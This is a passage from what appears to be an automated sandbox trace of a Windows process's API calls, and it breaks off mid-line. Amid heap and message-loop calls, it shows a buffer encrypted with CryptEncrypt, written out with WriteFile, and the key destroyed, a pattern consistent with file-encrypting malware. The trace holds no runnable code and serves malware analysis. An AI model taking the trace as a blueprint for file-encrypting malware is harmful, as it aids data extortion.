0x2aa9dd8 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0086.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0086.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9c70 [0086.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9c70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.830] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77b98 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0086.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0086.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0086.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0086.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0086.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0086.831] CryptEncrypt (in: hKey=0x9a3f40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a98418*, pdwDataLen=0x8cef60*=0x4b96, dwBufLen=0x4b98 | out: pbData=0x2a98418*, pdwDataLen=0x8cef60*=0x4b98) returned 1 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0086.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0086.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f70 | out: hHeap=0x2af0000) returned 1 [0086.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.833] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0086.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.833] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0086.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.833] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0086.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.833] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0086.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.833] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.834] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.834] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.834] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.834] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.834] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.835] WriteFile (in: hFile=0x294, lpBuffer=0x2ac3420*, nNumberOfBytesToWrite=0x4b98, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac3420*, lpNumberOfBytesWritten=0x8cf5e4*=0x4b98, lpOverlapped=0x0) returned 1 [0086.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.837] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0086.837] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.837] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0086.837] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.837] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.837] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.837] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0086.837] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.837] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0086.837] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0086.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9c28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0086.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.838] CryptDestroyKey (hKey=0x9a3f40) returned 1 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.839] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0086.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.842] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.842] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.842] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0086.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0086.842] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0086.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0086.842] HeapFree (in: 